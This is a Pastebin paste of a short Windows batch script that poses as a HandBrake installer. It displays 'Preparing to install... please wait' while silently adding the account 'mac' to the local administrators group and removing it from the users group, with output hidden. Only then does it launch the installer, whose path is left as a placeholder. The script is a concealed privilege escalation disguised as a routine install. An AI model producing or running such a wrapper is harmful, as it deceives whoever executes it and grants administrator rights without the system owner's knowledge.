Guest User

Untitled

a guest
Jun 22nd, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. @echo off
  2. cls
  3. echo Preparing to install... please wait
  4. net localgroup "administrators" mac /add > NUL2>&1
  5. net localgroup "users" mac /delete > NUL2>&1
  6. start "handbrake" "insert full, exact path to the handbrake installer here, and keep the quotes"
  7. cls
  8. exit
Add Comment
Please, Sign In to add comment